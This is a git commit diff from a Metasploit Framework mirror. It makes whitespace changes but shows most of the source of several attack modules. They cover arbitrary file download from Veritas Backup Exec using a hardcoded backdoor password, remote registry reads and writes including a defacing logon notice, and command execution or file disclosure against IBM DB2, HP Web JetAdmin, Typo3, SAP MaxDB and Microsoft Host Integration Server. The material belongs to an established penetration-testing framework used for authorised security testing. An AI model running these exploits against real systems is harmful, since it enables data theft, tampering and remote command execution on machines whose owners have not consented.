mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
big module whitespace/formatting cleanup pass
git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
54725099d5
commit
0ea6eca4bc
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,13 +18,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::NDMP
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Windows Remote File Access',
|
||||
'Description' => %q{
|
||||
This module abuses a logic flaw in the Backup Exec Windows Agent to download
|
||||
arbitrary files from the system. This flaw was found by someone who wishes to
|
||||
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
|
||||
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
|
||||
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
|
||||
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
|
||||
listed in the references section. To transfer an entire directory, specify a
|
||||
path that includes a trailing backslash.
|
||||
},
|
||||
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '18695'],
|
||||
['OSVDB', '18695'],
|
||||
['BID', '14551'],
|
||||
['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
|
||||
],
|
||||
@ -43,44 +43,44 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DefaultAction' => 'Download'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(10000),
|
||||
OptAddress.new('LHOST',
|
||||
OptAddress.new('LHOST',
|
||||
[
|
||||
false,
|
||||
"The local IP address to accept the data connection"
|
||||
]
|
||||
),
|
||||
OptPort.new('LPORT',
|
||||
OptPort.new('LPORT',
|
||||
[
|
||||
false,
|
||||
"The local port to accept the data connection"
|
||||
]
|
||||
),
|
||||
OptString.new('RPATH',
|
||||
[
|
||||
),
|
||||
OptString.new('RPATH',
|
||||
[
|
||||
true,
|
||||
"The remote filesystem path to download",
|
||||
"The remote filesystem path to download",
|
||||
"C:\\boot.ini"
|
||||
]
|
||||
),
|
||||
OptString.new('LPATH',
|
||||
[
|
||||
OptString.new('LPATH',
|
||||
[
|
||||
true,
|
||||
"The local filename to store the exported data",
|
||||
"The local filename to store the exported data",
|
||||
"backupexec_dump.mtf"
|
||||
]
|
||||
),
|
||||
),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Attempting to retrieve #{datastore['RPATH']}...")
|
||||
|
||||
|
||||
lfd = File.open(datastore['LPATH'], 'w')
|
||||
|
||||
|
||||
connect
|
||||
data = ndmp_recv()
|
||||
if (not data)
|
||||
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
username = "root"
|
||||
password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
|
||||
|
||||
|
||||
#
|
||||
# Authenticate using the backdoor password
|
||||
#
|
||||
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
username,
|
||||
password
|
||||
].pack('NNNNNNNNA*A*')
|
||||
|
||||
|
||||
print_status("Sending magic authentication request...")
|
||||
ndmp_send(auth)
|
||||
data = ndmp_recv()
|
||||
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("Did not receive a response to our authentication request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
@ -125,10 +125,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sfd = Rex::Socket.create_tcp_server(
|
||||
'LocalPort' => datastore['LPORT']
|
||||
)
|
||||
|
||||
|
||||
local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
|
||||
local_port = sfd.getsockname[2]
|
||||
|
||||
|
||||
#
|
||||
# Create the DATA_CONNECT request
|
||||
#
|
||||
@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
Rex::Socket.gethostbyname(local_addr)[3],
|
||||
local_port
|
||||
].pack('NNNNNNNA4N')
|
||||
|
||||
|
||||
print_status("Sending data connection request...")
|
||||
ndmp_send(conn)
|
||||
data = ndmp_recv()
|
||||
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sfd.close
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Wait for the agent to connect back
|
||||
@ -160,8 +160,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Waiting for the data connection...")
|
||||
rfd = sfd.accept()
|
||||
sfd.close
|
||||
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Create the Mover Set Record Size request
|
||||
#
|
||||
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
0,
|
||||
0x8000
|
||||
].pack('NNNNNNN')
|
||||
|
||||
|
||||
print_status("Sending transfer parameters...")
|
||||
ndmp_send(msrs)
|
||||
data = ndmp_recv()
|
||||
@ -182,18 +182,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("Did not receive a response to our parameters request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Define our tranfer parameters
|
||||
#
|
||||
xenv =
|
||||
xenv =
|
||||
[
|
||||
['USERNAME', ''],
|
||||
['BU_EXCLUDE_ACTIVE_FILES', '0'],
|
||||
['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
|
||||
]
|
||||
|
||||
|
||||
#
|
||||
# Create the DATA_START_BACKUP request
|
||||
#
|
||||
@ -208,26 +208,26 @@ class Metasploit3 < Msf::Auxiliary
|
||||
].pack('NNNNNNN')
|
||||
bkup += "dump"
|
||||
bkup += [ xenv.length ].pack('N')
|
||||
|
||||
|
||||
#
|
||||
# Encode the transfer parameters
|
||||
#
|
||||
xenv.each do |e|
|
||||
k,v = e
|
||||
|
||||
|
||||
# Variable
|
||||
bkup += [k.length].pack('N')
|
||||
bkup += k
|
||||
bkup += Rex::Encoder::NDR.align(k)
|
||||
|
||||
|
||||
# Value
|
||||
bkup += [v.length].pack('N')
|
||||
bkup += v
|
||||
bkup += Rex::Encoder::NDR.align(v)
|
||||
bkup += Rex::Encoder::NDR.align(v)
|
||||
end
|
||||
|
||||
|
||||
bkup[-1, 1] = "\x01"
|
||||
|
||||
|
||||
print_status("Sending backup request...")
|
||||
ndmp_send(bkup)
|
||||
data = ndmp_recv()
|
||||
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Create the GET_ENV request
|
||||
#
|
||||
@ -246,7 +246,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
0,
|
||||
0x4004,
|
||||
0,
|
||||
0
|
||||
0
|
||||
].pack('NNNNNN')
|
||||
|
||||
print_status("Sending environment request...")
|
||||
@ -256,14 +256,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("Did not receive a response to our environment request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
#
|
||||
end
|
||||
|
||||
#
|
||||
# Start transferring data
|
||||
#
|
||||
print_status("Transferring data...")
|
||||
bcnt = 0
|
||||
|
||||
|
||||
begin
|
||||
while (data = rfd.get_once)
|
||||
bcnt += data.length
|
||||
@ -271,13 +271,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
rescue ::EOFError
|
||||
end
|
||||
|
||||
|
||||
lfd.close
|
||||
rfd.close
|
||||
|
||||
|
||||
print_status("Transferred #{bcnt} bytes.")
|
||||
disconnect
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include ::Rex::Platforms::Windows
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Server Registry Access',
|
||||
'Description' => %q{
|
||||
This modules exploits a remote registry access flaw in the BackupExec Windows
|
||||
Server RPC service. This vulnerability was discovered by Pedram Amini and is based
|
||||
on the NDR stub information information posted to openrce.org.
|
||||
on the NDR stub information information posted to openrce.org.
|
||||
Please see the action list for the different attack modes.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -42,16 +42,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['System Information'],
|
||||
['Create Logon Notice']
|
||||
],
|
||||
'DefaultAction' => 'System Information'
|
||||
'DefaultAction' => 'System Information'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(6106),
|
||||
OptString.new('WARN',
|
||||
[
|
||||
OptString.new('WARN',
|
||||
[
|
||||
false,
|
||||
"The warning to display for the Logon Notice action",
|
||||
"The warning to display for the Logon Notice action",
|
||||
"Compromised by Metasploit!\r\n"
|
||||
]
|
||||
),
|
||||
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def auxiliary_commands
|
||||
return {
|
||||
return {
|
||||
"regread" => "Read a registry value",
|
||||
# "regenum" => "Enumerate registry keys",
|
||||
}
|
||||
@ -73,15 +73,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
logon_notice()
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
def cmd_regread(*args)
|
||||
|
||||
|
||||
if (args.length == 0)
|
||||
print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
paths = args[0].split("\\")
|
||||
hive = paths.shift
|
||||
subval = paths.pop
|
||||
@ -97,12 +97,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def cmd_regenum(*args)
|
||||
|
||||
|
||||
if (args.length == 0)
|
||||
print_status("Usage: regenum HKLM\\\\Software")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
paths = args[0].split("\\")
|
||||
hive = paths.shift
|
||||
subkey = "\\" + paths.join("\\")
|
||||
@ -115,10 +115,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
def system_info
|
||||
print_status("Dumping system information...")
|
||||
|
||||
|
||||
prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
|
||||
prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
|
||||
prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
|
||||
@ -132,14 +132,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
|
||||
print_status("The system runs on a #{deunicode(cpu)}")
|
||||
end
|
||||
|
||||
|
||||
def logon_notice
|
||||
print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
|
||||
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
|
||||
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
def deunicode(str)
|
||||
str.gsub(/\x00/, '').strip
|
||||
end
|
||||
@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#
|
||||
def backupexec_regwrite(hive, subkey, subval, type, data)
|
||||
stub = backupexec_regrpc_write(
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey,
|
||||
:subval => subval,
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey,
|
||||
:subval => subval,
|
||||
:type => type,
|
||||
:data => data
|
||||
)
|
||||
@ -159,15 +159,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false if resp.length == 0
|
||||
return true
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Read a registry key
|
||||
#
|
||||
def backupexec_regread(hive, subkey, subval, type = REG_SZ)
|
||||
stub = backupexec_regrpc_read(
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey,
|
||||
:subval => subval,
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey,
|
||||
:subval => subval,
|
||||
:type => type
|
||||
)
|
||||
resp = backupexec_regrpc_call(4, stub)
|
||||
@ -184,40 +184,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#
|
||||
def backupexec_regenum(hive, subkey)
|
||||
stub = backupexec_regrpc_enum(
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey
|
||||
)
|
||||
resp = backupexec_regrpc_call(7, stub)
|
||||
p resp
|
||||
|
||||
|
||||
return nil if resp.length == 0
|
||||
ret, len = resp[0,8].unpack('VV')
|
||||
return nil if ret == 0
|
||||
return nil if len == 0
|
||||
return resp[8, len]
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Call the backupexec registry service
|
||||
#
|
||||
#
|
||||
def backupexec_regrpc_call(opnum, data = '')
|
||||
|
||||
handle = dcerpc_handle(
|
||||
'93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
|
||||
'ncacn_ip_tcp', [datastore['RPORT']]
|
||||
)
|
||||
|
||||
|
||||
dcerpc_bind(handle)
|
||||
|
||||
resp = dcerpc.call(opnum, data)
|
||||
outp = ''
|
||||
|
||||
|
||||
if (dcerpc.last_response and dcerpc.last_response.stub_data)
|
||||
outp = dcerpc.last_response.stub_data
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
||||
outp
|
||||
end
|
||||
|
||||
@ -261,11 +261,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
hive = opts[:hive] || HKEY_LOCAL_MACHINE
|
||||
type = opts[:type] || REG_SZ
|
||||
data = opts[:data] || ''
|
||||
|
||||
if (type == REG_SZ || type == REG_EXPAND_SZ)
|
||||
|
||||
if (type == REG_SZ || type == REG_EXPAND_SZ)
|
||||
data = Rex::Text.to_unicode(data+"\x00")
|
||||
end
|
||||
|
||||
|
||||
stub =
|
||||
NDR.UnicodeConformantVaryingString(subkey) +
|
||||
NDR.UnicodeConformantVaryingString(subval) +
|
||||
@ -279,5 +279,5 @@ class Metasploit3 < Msf::Auxiliary
|
||||
NDR.long(hive)
|
||||
return stub
|
||||
end
|
||||
|
||||
|
||||
end
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
|
||||
'Description' => %q{
|
||||
This module tests for a logic vulnerability in the Cisco VPN Concentrator
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::SMB
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability.',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Remote Command Server
|
||||
@ -31,12 +35,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Mar 4 2004'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ true, 'The command to execute', 'ver']),
|
||||
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
|
||||
OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
|
||||
], self.class )
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def run
|
||||
@ -46,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
|
||||
|
||||
# Connect with a valid user/pass. if not, then bail.
|
||||
# Connect with a valid user/pass. if not, then bail.
|
||||
begin
|
||||
smb_login()
|
||||
rescue ::Exception => e
|
||||
@ -54,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Have it so our command arg is convenient to call.
|
||||
|
||||
# Have it so our command arg is convenient to call.
|
||||
rcmd = datastore['CMD']
|
||||
|
||||
print_status("Connecting to named pipe \\DB2REMOTECMD...")
|
||||
@ -84,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# Read from the pipe and give us the data.
|
||||
res = pipe.read()
|
||||
puts res
|
||||
|
||||
|
||||
# Close the named pipe and disconnect from the socket.
|
||||
pipe.close
|
||||
pipe.close
|
||||
disconnect
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'May 27 2008'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3000),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
|
||||
@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
data = "\x75" + datastore['CMD']
|
||||
pad = "\x00" * 512
|
||||
|
||||
pkt = data + pad
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
|
||||
pkt = data + pad
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
sock.put(pkt)
|
||||
|
||||
# try to suck it all in.
|
||||
sleep(5)
|
||||
|
||||
|
||||
res = sock.get_once
|
||||
|
||||
|
||||
res.each do |info|
|
||||
puts "[*] #{info.gsub(/[^[:print:]]+/,"")}" # hack.
|
||||
end
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'May 27 2008'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3500),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
|
||||
@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
data = "\x75" + datastore['CMD']
|
||||
pad = "\x00" * 512
|
||||
|
||||
pkt = data + pad
|
||||
|
||||
|
||||
pkt = data + pad
|
||||
|
||||
# commands are executed blindly.
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
sock.put(pkt)
|
||||
|
||||
sleep(1)
|
||||
|
||||
|
||||
sock.get_once
|
||||
|
||||
|
||||
print_status("Executed '#{datastore['CMD']}'...")
|
||||
|
||||
disconnect
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
This module abuses a command execution vulnerability within the
|
||||
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'URL', 'http://www.milw0rm.com/exploits/294' ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 27 2004'))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8000),
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of
|
||||
Typo3. This flaw can be used to read any file that the web server user account has
|
||||
access to.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
error_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&locationData=1:"
|
||||
ju_hash = nil
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => error_uri,
|
||||
'method' => 'GET',
|
||||
@ -65,24 +69,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
if (res and res.message == "OK")
|
||||
res.body =~ /jumpurl Secure: Calculated juHash, ((\w)+), did not match the submitted juHash./
|
||||
|
||||
|
||||
if $1.nil?
|
||||
print_error("Error while getting juHash. Maybe the version is already patched...")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
ju_hash = $1
|
||||
print_status("Getting juHash from error message: #{ju_hash}")
|
||||
|
||||
|
||||
else
|
||||
print_error("No response from the server.")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
file_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:"
|
||||
print_status("Trying to get #{datastore['RFILE']}.")
|
||||
|
||||
print_status("Trying to get #{datastore['RFILE']}.")
|
||||
|
||||
file = send_request_raw({
|
||||
'uri' => file_uri,
|
||||
'method' => 'GET',
|
||||
@ -92,15 +96,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
},25)
|
||||
|
||||
|
||||
if (file and file.message = "OK")
|
||||
if file.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
|
||||
print_error("File #{datastore['RFILE']} does not exist.")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Writing local file #{datastore['LFILE']}.")
|
||||
open(datastore['LFILE'],'w') {|f| f << file.body }
|
||||
open(datastore['LFILE'],'w') {|f| f << file.body }
|
||||
else
|
||||
print_error("Error while getting file.")
|
||||
end
|
||||
|
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Jan 9 2008'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(7210),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
|
||||
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sock.put(pdbmsrv)
|
||||
sock.get_once
|
||||
sock.put(db_version)
|
||||
|
||||
|
||||
ver = sock.get_once
|
||||
|
||||
info = ver[27,2000]
|
||||
@ -69,10 +69,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
#Send our command.
|
||||
len = 39 + datastore['CMD'].length
|
||||
|
||||
|
||||
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"
|
||||
data << "\x00\x00\x04\x00" + len.chr + "\x00\x00\x00\x65\x78\x65\x63\x5F\x73\x64"
|
||||
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
|
||||
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
|
||||
|
||||
sock.put(data)
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability.',
|
||||
'Description' => %q{
|
||||
This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.
|
||||
@ -33,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Oct 14 2008'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(0),
|
||||
OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),
|
||||
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
|
||||
], self.class )
|
||||
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def run
|
||||
@ -53,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (dport == 0)
|
||||
|
||||
dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp')
|
||||
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
|
||||
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
|
||||
|
||||
if (not dport)
|
||||
print_status("Could not determine the RPC port used by the Service.")
|
||||
@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
cmd = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}")
|
||||
|
||||
|
||||
print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")
|
||||
|
||||
begin
|
||||
@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
=begin
|
||||
|
@ -1,3 +1,6 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
@ -13,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server Configuration Enumerator',
|
||||
@ -31,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
print_status("Running MS SQL Server Enumeration...")
|
||||
|
||||
|
||||
if mssql_login_datastore
|
||||
#Get Version
|
||||
print_status("Version:")
|
||||
@ -42,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
